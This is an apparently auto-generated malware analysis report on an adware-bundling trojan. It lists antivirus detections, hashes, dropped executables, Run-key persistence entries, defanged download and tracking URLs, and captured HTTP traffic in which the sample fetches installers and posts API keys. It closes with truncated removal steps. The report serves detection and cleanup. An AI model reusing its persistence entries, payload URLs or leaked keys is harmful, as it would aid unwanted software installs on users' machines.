Application.Bundler.Temonde.NN_52a0648569
Application.Bundler.Temonde.NN (BitDefender), SoftwareBundler:MSIL/Wizrem (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.MulDrop7.35368 (DrWeb), Application.Bundler.Temonde.NN (B) (Emsisoft), Packed-NV!52A06485699D (McAfee), Trojan.Gen.2 (Symantec), Trojan.MSIL.Crypt (Ikarus), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_MONETIZE.SM (TrendMicro), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Packed, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 52a06485699d591efc2e142444c36154
SHA1: c2f159956ecf5dd3652f812e91132e632c9165f1
SHA256: 1d93979c8ef5527676db3ea3636930abab1427fadba4aeeaa35e8518e1172306
SSDeep: 1536:/cQPbdKKQUuSC6ROWhXYqRoDx3JngJIYDrPjQF:/cQMK1PsobMdiIErP8F
Size: 53248 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-03 09:50:06
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
SecondL.exe:2700
Sho9libi.exe:1772
OneTwo.exe:2916
%original file name%.exe:1924
The Application injects its code into the following process(es):
52p1njv1z5v.exe:3708
%original file name%.exe:1908
VIKAUDDVJ.exe:3816
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SecondL.exe:2700 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
The Application deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2700.428737 (0 bytes)
The process Sho9libi.exe:1772 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
The process OneTwo.exe:2916 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files%\VIKAUDDVJG\uninstaller.exe.config (1 bytes)
%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe (91046 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
%Program Files%\VIKAUDDVJG\uninstaller.exe (44251 bytes)
The Application deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2916.429283 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2916.429283 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2916.429283 (0 bytes)
The process %original file name%.exe:1908 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe (227194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe (12941 bytes)
The process VIKAUDDVJ.exe:3816 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files%\VIKAUDDVJG\cast.config (37 bytes)
Registry activity
The process SecondL.exe:2700 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 52p1njv1z5v.exe:3708 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
To run itself automatically each time Windows boots, the Application adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"drg0zk23g1j" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe"
The process Sho9libi.exe:1772 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process OneTwo.exe:2916 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:1924 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:1908 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"MaxFileSize" = "1048576"
To run itself automatically each time Windows boots, the Application adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_GN80Z" = "C:\%original file name%.exe"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process VIKAUDDVJ.exe:3816 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"FileDirectory" = "%windir%\tracing"
To run itself automatically each time Windows boots, the Application adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Y8LH5W7H9S9CA9N" = "%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 0c64e1bb0a9e858adb364f0f5f81e026 | c:\Program Files\VIKAUDDVJG\VIKAUDDVJ.exe |
| 866b3dbc4722e039d2ada421d6734c81 | c:\Program Files\VIKAUDDVJG\uninstaller.exe |
| 195fce89932990ab844021c43d01fb8c | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe |
| 3164f6f1e1bf642a17038ec9ead0211b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe |
| babda8b6e42c1524f05e41fe4ef4639b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe |
| 34817ecb1377edb1df38a90a885f8c5d | c:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: 46VN
Product Name: 46VN
Product Version: 5.2.0.2
Legal Copyright: Copyright (c) 2847
Legal Trademarks:
Original Filename: JAY789007Z66Z.exe
Internal Name: JAY789007Z66Z.exe
File Version: 5.2.0.2
File Description: 46VNOFUU
Comments: 46VNOFUU
Language: German (Germany)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 47380 | 47616 | 4.3033 | c232c66c7538c5a084162dec9e6e8212 |
| .rsrc | 57344 | 4484 | 4608 | 3.52305 | bc36757707b308a40650bca3f231c408 |
| .reloc | 65536 | 12 | 512 | 0.056519 | f7ba17573fc40bd6cefdd0bd02b3390e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
75ed39b498b600f04c0f76ce2fdc492b
URLs
| URL | IP |
|---|---|
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe | |
| hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe | |
| hxxp://bratitlamio.com/exe/updater.exe | |
| hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://www.wizzmonetize.com/api/v5/config | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://ladomainadeserver.com/api/v5/config | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:18 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:19 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=3d197eebbd5cdc7044ebb0a073b1e168600e80e3; expires=Mon, 28-Aug-2017 12:22:19 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /exe/updater.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:14 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47a47968c&buying_product_name=DefaultProduct&buying_partner_name=DefaultPartner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:10 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=21ov4vepkn4dr7qrnm2h3l1673; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=bi4gjqakdo8u93hltarvh4vhk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=b9nctcdp6b5aqobqb1jc7qu9h0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
The Application connects to the servers at the following location(s):
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
SearchProtocolHost.exe_3324:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610
SearchFilterHost.exe_3308:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
SecondL.exe:2700
Sho9libi.exe:1772
OneTwo.exe:2916
%original file name%.exe:1924
- Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
